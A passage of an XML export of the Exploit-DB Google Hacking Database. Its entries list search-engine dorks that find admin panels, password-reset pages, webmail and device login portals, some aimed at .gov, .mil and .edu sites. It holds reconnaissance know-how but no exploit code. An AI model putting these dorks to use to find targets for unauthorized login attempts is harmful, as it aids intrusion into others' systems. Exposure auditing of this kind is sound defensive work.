<textualDescription>Login Portal:
site:*/securelogin.asp
Reza Abasi(Turku)
</textualDescription>
<query>site:*/securelogin.asp</query>
<querystring>https://www.google.com/search?q=site:*/securelogin.asp</querystring>
<edb></edb>
<date>2019-08-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5475</id>
<link>https://www.exploit-db.com/ghdb/5475</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/Security/Login</shortDescription>
<textualDescription>Login Portal:
site:*/Security/Login
Reza Abasi(Turku)
</textualDescription>
<query>site:*/Security/Login</query>
<querystring>https://www.google.com/search?q=site:*/Security/Login</querystring>
<edb></edb>
<date>2019-08-29</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5485</id>
<link>https://www.exploit-db.com/ghdb/5485</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/SendPassword</shortDescription>
<textualDescription>Login Portal:
site:*/SendPassword
Reza Abasi(Turku)
</textualDescription>
<query>site:*/SendPassword</query>
<querystring>https://www.google.com/search?q=site:*/SendPassword</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5351</id>
<link>https://www.exploit-db.com/ghdb/5351</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/sign-in</shortDescription>
<textualDescription>login portal
site:*/sign-in
site:*/user/sign-in/
Reza Abasi(Turku)
</textualDescription>
<query>site:*/sign-in</query>
<querystring>https://www.google.com/search?q=site:*/sign-in</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5911</id>
<link>https://www.exploit-db.com/ghdb/5911</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/signup/pass</shortDescription>
<textualDescription>Login Portal using
site:*/signup/pass
</textualDescription>
<query>site:*/signup/pass</query>
<querystring>https://www.google.com/search?q=site:*/signup/pass</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>5858</id>
<link>https://www.exploit-db.com/ghdb/5858</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/signup/password.php</shortDescription>
<textualDescription>Login Portal:
site:*/signup/password.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/signup/password.php</query>
<querystring>https://www.google.com/search?q=site:*/signup/password.php</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5381</id>
<link>https://www.exploit-db.com/ghdb/5381</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/sign_in.aspx</shortDescription>
<textualDescription>Login page :
site:*/sign_in.aspx
Reza Abasi(Turku)
</textualDescription>
<query>site:*/sign_in.aspx</query>
<querystring>https://www.google.com/search?q=site:*/sign_in.aspx</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5667</id>
<link>https://www.exploit-db.com/ghdb/5667</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/siteminderagent/forms/login.fcc</shortDescription>
<textualDescription>Login Portal:
site:*/siteminderagent/forms/login.fcc
Reza Abasi(Turku)
</textualDescription>
<query>site:*/siteminderagent/forms/login.fcc</query>
<querystring>https://www.google.com/search?q=site:*/siteminderagent/forms/login.fcc</querystring>
<edb></edb>
<date>2019-12-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5377</id>
<link>https://www.exploit-db.com/ghdb/5377</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/src/login.php</shortDescription>
<textualDescription>Login page :
site:*/src/login.php
site:*/php/login.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/src/login.php</query>
<querystring>https://www.google.com/search?q=site:*/src/login.php</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5915</id>
<link>https://www.exploit-db.com/ghdb/5915</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/test/login</shortDescription>
<textualDescription># Google Dork: site:*/test/login
# By using this dork, pages containing various login portals can be found.
# Date: 17/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>site:*/test/login</query>
<querystring>https://www.google.com/search?q=site:*/test/login</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5476</id>
<link>https://www.exploit-db.com/ghdb/5476</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/updatepassword.php</shortDescription>
<textualDescription>Login Portal:
site:*/updatepassword.php
site:*/lost-password
site:*/changepassword.php
site:*/forgotpw.php
site:*/reset-password
Reza Abasi(Turku)
</textualDescription>
<query>site:*/updatepassword.php</query>
<querystring>https://www.google.com/search?q=site:*/updatepassword.php</querystring>
<edb></edb>
<date>2019-08-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5861</id>
<link>https://www.exploit-db.com/ghdb/5861</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/user/forgot</shortDescription>
<textualDescription>Login Portal:
site:*/user/forgot
Reza Abasi(Turku)
</textualDescription>
<query>site:*/user/forgot</query>
<querystring>https://www.google.com/search?q=site:*/user/forgot</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5910</id>
<link>https://www.exploit-db.com/ghdb/5910</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/user/forgotpass</shortDescription>
<textualDescription>Login Portal using
site:*/user/forgotpass
</textualDescription>
<query>site:*/user/forgotpass</query>
<querystring>https://www.google.com/search?q=site:*/user/forgotpass</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>5347</id>
<link>https://www.exploit-db.com/ghdb/5347</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/user/login</shortDescription>
<textualDescription>login portal
site:*/user/login
Reza Abasi(Turku)
</textualDescription>
<query>site:*/user/login</query>
<querystring>https://www.google.com/search?q=site:*/user/login</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5462</id>
<link>https://www.exploit-db.com/ghdb/5462</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/user/password/</shortDescription>
<textualDescription>Login Page:
site:*/user/password/
Reza Abasi(Turku)
</textualDescription>
<query>site:*/user/password/</query>
<querystring>https://www.google.com/search?q=site:*/user/password/</querystring>
<edb></edb>
<date>2019-08-28</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5583</id>
<link>https://www.exploit-db.com/ghdb/5583</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/usercp.php</shortDescription>
<textualDescription>Login Portal:
site:*/usercp.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/usercp.php</query>
<querystring>https://www.google.com/search?q=site:*/usercp.php</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5355</id>
<link>https://www.exploit-db.com/ghdb/5355</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/users/login_form</shortDescription>
<textualDescription>login portal
site:*/users/login_form
Reza Abasi(Turku)
</textualDescription>
<query>site:*/users/login_form</query>
<querystring>https://www.google.com/search?q=site:*/users/login_form</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5478</id>
<link>https://www.exploit-db.com/ghdb/5478</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/validar_usuario.php</shortDescription>
<textualDescription>Login Portal:
site:*/validar_usuario.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/validar_usuario.php</query>
<querystring>https://www.google.com/search?q=site:*/validar_usuario.php</querystring>
<edb></edb>
<date>2019-08-30</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5445</id>
<link>https://www.exploit-db.com/ghdb/5445</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/web-hosting/cplogin</shortDescription>
<textualDescription>login page:
site:*/web-hosting/cplogin
Reza Abasi(Turku)
</textualDescription>
<query>site:*/web-hosting/cplogin</query>
<querystring>https://www.google.com/search?q=site:*/web-hosting/cplogin</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5424</id>
<link>https://www.exploit-db.com/ghdb/5424</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/Webmail/</shortDescription>
<textualDescription>Login Page:
site:*/Webmail/
site:Webmail.*.*/owa/
site:Webmail.*.*/ intitle:&quot;login&quot;
site:webmail.*.* intitle:&quot;Webmail Login&quot;
site:mail.*.* intitle:&quot;login&quot;
Reza Abasi
</textualDescription>
<query>site:*/Webmail/</query>
<querystring>https://www.google.com/search?q=site:*/Webmail/</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5555</id>
<link>https://www.exploit-db.com/ghdb/5555</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/wp-admin/user-edit.php</shortDescription>
<textualDescription>Login Portal:
site:*/wp-admin/user-edit.php
Reza Abasi(Turku)
</textualDescription>
<query>site:*/wp-admin/user-edit.php</query>
<querystring>https://www.google.com/search?q=site:*/wp-admin/user-edit.php</querystring>
<edb></edb>
<date>2019-09-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5454</id>
<link>https://www.exploit-db.com/ghdb/5454</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*/wp-login?redirect_to= intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login Page:
site:*/wp-login?redirect_to= intitle:&quot;login&quot;
inurl:/wordpress/wp-login?action=lostpassword -site:stackexchange.com
inurl:&quot;/wp-login.php?redirect_to=&quot; intitle:&quot;Log In&quot;
inurl:&quot;/wp-login.php?action=lostpassword&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*/wp-login?redirect_to= intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:*/wp-login?redirect_to= intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5490</id>
<link>https://www.exploit-db.com/ghdb/5490</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*:8000/login#forgot intitle:&quot;login&quot;</shortDescription>
<textualDescription>Login portal:
site:*:8000/login#forgot intitle:&quot;login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:*:8000/login#forgot intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:*:8000/login#forgot intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5521</id>
<link>https://www.exploit-db.com/ghdb/5521</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*:8443/login_up.php</shortDescription>
<textualDescription>Google Dork Submission to find login pages for Plesk Onyx sites, usually ftp servers.
https://www.google.com/search?q=site:*:8443/login_up.php
Author: MiningOmerta
</textualDescription>
<query>site:*:8443/login_up.php</query>
<querystring>https://www.google.com/search?q=site:*:8443/login_up.php</querystring>
<edb></edb>
<date>2019-09-12</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>5373</id>
<link>https://www.exploit-db.com/ghdb/5373</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:*:8888/login.aspx</shortDescription>
<textualDescription>Login Pages:
site:*:8888/login.aspx
inurl::8888/login.php
inurl::8888/login.aspx
Reza Abasi
</textualDescription>
<query>site:*:8888/login.aspx</query>
<querystring>https://www.google.com/search?q=site:*:8888/login.aspx</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5933</id>
<link>https://www.exploit-db.com/ghdb/5933</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.&quot;atlassian.net&quot; &quot;Log in to your account&quot;</shortDescription>
<textualDescription>Exposes login portals that may expose internal service desks.
site:.&quot;atlassian.net&quot; &quot;Log in to your account&quot;
site:&quot;.atlassian.net&quot; / &quot;service desk/customer/user/login&quot;</textualDescription>
<query>site:.&quot;atlassian.net&quot; &quot;Log in to your account&quot;</query>
<querystring>https://www.google.com/search?q=site:.&quot;atlassian.net&quot; &quot;Log in to your account&quot;</querystring>
<edb></edb>
<date>2020-04-21</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>8288</id>
<link>https://www.exploit-db.com/ghdb/8288</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:..us inurl:&quot;login.php&quot;</shortDescription>
<textualDescription># Google Dork: site:..us inurl:&quot;login.php&quot;
# Pages Containing Login Portals
# Date: 30/10/2023
# Exploit Husain Ahmad</textualDescription>
<query>site:..us inurl:&quot;login.php&quot;</query>
<querystring>https://www.google.com/search?q=site:..us inurl:&quot;login.php&quot;</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Husain Ahmad</author>
</entry>
<entry>
<id>7501</id>
<link>https://www.exploit-db.com/ghdb/7501</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.bd http intitle: admin</shortDescription>
<textualDescription># Google Dork: site:.bd http intitle: admin
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: MD. Rimel</textualDescription>
<query>site:.bd http intitle: admin</query>
<querystring>https://www.google.com/search?q=site:.bd http intitle: admin</querystring>
<edb></edb>
<date>2021-10-27</date>
<author>MD. Rimel</author>
</entry>
<entry>
<id>7893</id>
<link>https://www.exploit-db.com/ghdb/7893</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.com intitle:&quot;Admin portal&quot;</shortDescription>
<textualDescription># Google Dork: site:.com intitle:&quot;Admin portal&quot;
# Pages Containing Login Portals
# Date: 20/12/2021
# Exploit Author: Yuliia Danylovych</textualDescription>
<query>site:.com intitle:&quot;Admin portal&quot;</query>
<querystring>https://www.google.com/search?q=site:.com intitle:&quot;Admin portal&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Yuliia Danylovych</author>
</entry>
<entry>
<id>7207</id>
<link>https://www.exploit-db.com/ghdb/7207</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.com inurl:(&quot;administrator/login.php&quot; OR &quot;admin/login.php&quot;)</shortDescription>
<textualDescription># Google Dork: site:.com inurl:(&quot;administrator/login.php&quot; OR &quot;admin/login.php&quot;)
# Pages Containing Login Portals
# Date: 10/09/2021
# Exploit Author: Madan Kumawat</textualDescription>
<query>site:.com inurl:(&quot;administrator/login.php&quot; OR &quot;admin/login.php&quot;)</query>
<querystring>https://www.google.com/search?q=site:.com inurl:(&quot;administrator/login.php&quot; OR &quot;admin/login.php&quot;)</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Madan Kumawat</author>
</entry>
<entry>
<id>8215</id>
<link>https://www.exploit-db.com/ghdb/8215</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.com inurl:/login.aspx</shortDescription>
<textualDescription># Google Dork: site:.com inurl:/login.aspx
# Pages Containing Login Portals
# Date: 04/07/2023
# Exploit Author: Sachin Gupta</textualDescription>
<query>site:.com inurl:/login.aspx</query>
<querystring>https://www.google.com/search?q=site:.com inurl:/login.aspx</querystring>
<edb></edb>
<date>2023-07-04</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>8326</id>
<link>https://www.exploit-db.com/ghdb/8326</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal</shortDescription>
<textualDescription># Google Dork: site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal
# Pages Containing Login Portals
# Date: 07/11/2023
# Exploit: Qais Qais</textualDescription>
<query>site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal</query>
<querystring>https://www.google.com/search?q=site:.com inurl:login | inurl:logon | inurl:sign-in | inurl:signin | inurl:portal</querystring>
<edb></edb>
<date>2023-11-07</date>
<author>Qais Qais</author>
</entry>
<entry>
<id>7704</id>
<link>https://www.exploit-db.com/ghdb/7704</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.edu inurl:login &quot;Admin&quot;</shortDescription>
<textualDescription># Google Dork: site:.edu inurl:login &quot;Admin&quot;
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:.edu inurl:login &quot;Admin&quot;</query>
<querystring>https://www.google.com/search?q=site:.edu inurl:login &quot;Admin&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>7675</id>
<link>https://www.exploit-db.com/ghdb/7675</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.edu.in inurl:login.aspx</shortDescription>
<textualDescription># Google Dork: site:.edu.in inurl:login.aspx
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Mohamed Rahman Shareff S</textualDescription>
<query>site:.edu.in inurl:login.aspx</query>
<querystring>https://www.google.com/search?q=site:.edu.in inurl:login.aspx</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Mohamed Rahman Shareff S</author>
</entry>
<entry>
<id>7676</id>
<link>https://www.exploit-db.com/ghdb/7676</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.edu.in inurl:login.aspx</shortDescription>
<textualDescription># Google Dork: site:.edu.in inurl:login.aspx
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Mohamed Rahman Shareff S</textualDescription>
<query>site:.edu.in inurl:login.aspx</query>
<querystring>https://www.google.com/search?q=site:.edu.in inurl:login.aspx</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Mohamed Rahman Shareff S</author>
</entry>
<entry>
<id>7702</id>
<link>https://www.exploit-db.com/ghdb/7702</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.edu.in inurl:login.php</shortDescription>
<textualDescription># Google Dork: site:.edu.in inurl:login.php
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:.edu.in inurl:login.php</query>
<querystring>https://www.google.com/search?q=site:.edu.in inurl:login.php</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>6472</id>
<link>https://www.exploit-db.com/ghdb/6472</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.gov inurl:admin login</shortDescription>
<textualDescription>Description- site:.gov inurl:admin login
This dork gives Admin login panels of many websites.
</textualDescription>
<query>site:.gov inurl:admin login</query>
<querystring>https://www.google.com/search?q=site:.gov inurl:admin login</querystring>
<edb></edb>
<date>2020-08-10</date>
<author>Aditya Rana</author>
</entry>
<entry>
<id>4042</id>
<link>https://www.exploit-db.com/ghdb/4042</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.mil + inurl:login.aspx | .asp | .html | .php | .htm</shortDescription>
<textualDescription>*Google Search : site:.mil + inurl:login.aspx | .asp | .html | .php | .htm
Zeel Chavda</textualDescription>
<query>site:.mil + inurl:login.aspx | .asp | .html | .php | .htm</query>
<querystring>https://www.google.com/search?q=site:.mil + inurl:login.aspx | .asp | .html | .php | .htm</querystring>
<edb></edb>
<date>2015-07-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>8213</id>
<link>https://www.exploit-db.com/ghdb/8213</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.org inurl:/admin.aspx</shortDescription>
<textualDescription># Google Dork: site:.org inurl:/admin.aspx
# Pages Containing Login Portals
# Date: 04/07/2023
# Exploit Author: Sachin Gupta</textualDescription>
<query>site:.org inurl:/admin.aspx</query>
<querystring>https://www.google.com/search?q=site:.org inurl:/admin.aspx</querystring>
<edb></edb>
<date>2023-07-04</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>8214</id>
<link>https://www.exploit-db.com/ghdb/8214</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:.org inurl:/login.aspx</shortDescription>
<textualDescription># Google Dork: site:.org inurl:/login.aspx
# Pages Containing Login Portals
# Date: 04/07/2023
# Exploit Author: Sachin Gupta</textualDescription>
<query>site:.org inurl:/login.aspx</query>
<querystring>https://www.google.com/search?q=site:.org inurl:/login.aspx</querystring>
<edb></edb>
<date>2023-07-04</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>5368</id>
<link>https://www.exploit-db.com/ghdb/5368</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:/*:8081/nexus/#welcome -inurl:&quot;/nexus/content/&quot;</shortDescription>
<textualDescription>Nexus repository Login Portal:
site:/*:8081/nexus/#welcome -inurl:&quot;/nexus/content/&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:/*:8081/nexus/#welcome -inurl:&quot;/nexus/content/&quot;</query>
<querystring>https://www.google.com/search?q=site:/*:8081/nexus/#welcome -inurl:&quot;/nexus/content/&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5374</id>
<link>https://www.exploit-db.com/ghdb/5374</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:/*:81 -site:/*:8080 intitle:&quot;::: Login :::&quot;</shortDescription>
<textualDescription>Login Page for online cams:
site:/*:81 -site:/*:8080 intitle:&quot;::: Login :::&quot;
site:/*:88 -site:/*:8080 intitle:&quot;::: Login :::&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:/*:81 -site:/*:8080 intitle:&quot;::: Login :::&quot;</query>
<querystring>https://www.google.com/search?q=site:/*:81 -site:/*:8080 intitle:&quot;::: Login :::&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5384</id>
<link>https://www.exploit-db.com/ghdb/5384</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:/auth.*.*/login</shortDescription>
<textualDescription>Login page :
site:/auth.*.*/login
Reza Abasi(Turku)
</textualDescription>
<query>site:/auth.*.*/login</query>
<querystring>https://www.google.com/search?q=site:/auth.*.*/login</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5360</id>
<link>https://www.exploit-db.com/ghdb/5360</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:account.*.*/login</shortDescription>
<textualDescription>login portal
site:account.*.*/login
site:accounts.*.*/login/
Reza Abasi(Turku)
</textualDescription>
<query>site:account.*.*/login</query>
<querystring>https://www.google.com/search?q=site:account.*.*/login</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5903</id>
<link>https://www.exploit-db.com/ghdb/5903</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:account.*.*/recovery</shortDescription>
<textualDescription>Login Portal:
site:account.*.*/recovery
Reza Abasi(Turku)
</textualDescription>
<query>site:account.*.*/recovery</query>
<querystring>https://www.google.com/search?q=site:account.*.*/recovery</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5328</id>
<link>https://www.exploit-db.com/ghdb/5328</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:accounts.*.com/signin/</shortDescription>
<textualDescription> login portal
site:accounts.*.com/signin/
site:account.*.com/signin/
site:accounts.*.*/signin/
Reza Abasi(Turku)
</textualDescription>
<query>site:accounts.*.com/signin/</query>
<querystring>https://www.google.com/search?q=site:accounts.*.com/signin/</querystring>
<edb></edb>
<date>2019-08-07</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5394</id>
<link>https://www.exploit-db.com/ghdb/5394</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:admin.*.* intitle:&quot;Admin Login&quot;</shortDescription>
<textualDescription>Login page :
site:admin.*.* intitle:&quot;Admin Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>site:admin.*.* intitle:&quot;Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=site:admin.*.* intitle:&quot;Admin Login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8337</id>
<link>https://www.exploit-db.com/ghdb/8337</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:admin.*.* inurl:login</shortDescription>
<textualDescription># Google Dork: site:admin.*.* inurl:login
# Pages Containing Login Portals
# Date: 10/11/2023
# Exploit Author: Praharsh Kumar Singh
</textualDescription>
<query>site:admin.*.* inurl:login</query>
<querystring>https://www.google.com/search?q=site:admin.*.* inurl:login</querystring>
<edb></edb>
<date>2023-11-10</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>6451</id>
<link>https://www.exploit-db.com/ghdb/6451</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:admin.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: site:admin.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;
# Various admin login pages.
# Date: 2/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>site:admin.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:admin.*.*/ intext:&quot;login&quot; intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5453</id>
<link>https://www.exploit-db.com/ghdb/5453</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:admin.*.*/forgot?username=</shortDescription>
<textualDescription>Login for password reset:
site:admin.*.*/forgot?username=
site:*/admin/password/reset
site:*/admin/login/forgot
site:*/admin/pass
site:*/admin/password/
inurl:&quot;/index.php/lostpassword/&quot;
inurl:&quot;index.php?login/forgot_password&quot;
site:*/auth/v2/login/password_reset
site:*/seller/forgot/
site:*/recoverpassword
Reza Abasi(Turku)
</textualDescription>
<query>site:admin.*.*/forgot?username=</query>
<querystring>https://www.google.com/search?q=site:admin.*.*/forgot?username=</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5336</id>
<link>https://www.exploit-db.com/ghdb/5336</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:admin.*.com/signin/</shortDescription>
<textualDescription># Exploit Title: Signin of Admin Subdomain
# Google Dork: site:admin.*.com/signin/
# Author: Francis Al Victoriano
</textualDescription>
<query>site:admin.*.com/signin/</query>
<querystring>https://www.google.com/search?q=site:admin.*.com/signin/</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>5309</id>
<link>https://www.exploit-db.com/ghdb/5309</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:amazonaws.com inurl:login.php</shortDescription>
<textualDescription>Finding login page of php sites
site:amazonaws.com inurl:login.php
Reza Abasi(Turku)
</textualDescription>
<query>site:amazonaws.com inurl:login.php</query>
<querystring>https://www.google.com/search?q=site:amazonaws.com inurl:login.php</querystring>
<edb></edb>
<date>2019-07-31</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8085</id>
<link>https://www.exploit-db.com/ghdb/8085</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:ap.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription># Google Dork: site:ap.*.* intitle:&quot;login&quot;
# Pages Containing Login Portals
# Date:24/02/2023
# Exploit Author: Sanu Jose M</textualDescription>
<query>site:ap.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:ap.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2023-02-24</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>5507</id>
<link>https://www.exploit-db.com/ghdb/5507</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:app.*.*/ intext:login</shortDescription>
<textualDescription>#Google Dork for more login pages, sometimes for internal apps.
#Author: MiningOmerta
</textualDescription>
<query>site:app.*.*/ intext:login</query>
<querystring>https://www.google.com/search?q=site:app.*.*/ intext:login</querystring>
<edb></edb>
<date>2019-09-05</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>5491</id>
<link>https://www.exploit-db.com/ghdb/5491</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:auth.*.*/signin</shortDescription>
<textualDescription>Login Portal:
site:auth.*.*/signin
site:*/auth/login intitle:&quot;signin&quot;
site:*/auth.php
site:signin.*.* intitle:&quot;signin&quot; -facebook.com
Reza Abasi(Turku)
</textualDescription>
<query>site:auth.*.*/signin</query>
<querystring>https://www.google.com/search?q=site:auth.*.*/signin</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6710</id>
<link>https://www.exploit-db.com/ghdb/6710</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:checkin.*.* intitle:&quot;login&quot;</shortDescription>
<textualDescription>Pages containing login portal:
site:checkin.*.* intitle:&quot;login&quot;
BR,
Reza Abasi(Turku)
Iranian cyber sec researcher
</textualDescription>
<query>site:checkin.*.* intitle:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=site:checkin.*.* intitle:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>8212</id>
<link>https://www.exploit-db.com/ghdb/8212</link>
<category>Pages Containing Login Portals</category>
<shortDescription>site:co.in inurl:/admin.aspx</shortDescription>
<textualDescription># Google Dork: site:co.in inurl:/admin.aspx
# Pages Containing Login Portals
# Date: 04/07/2023
# Exploit Author: Sachin Gupta</textualDescription>
<query>site:co.in inurl:/admin.aspx</query>
<querystring>https://www.google.com/search?q=site:co.in inurl:/admin.aspx</querystring>
<edb></edb>
<date>2023-07-04</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>8211</id>
<link>https://www.exploit-db.com/ghdb/8211</link>
<category>Pages Containing Login Portals</category>
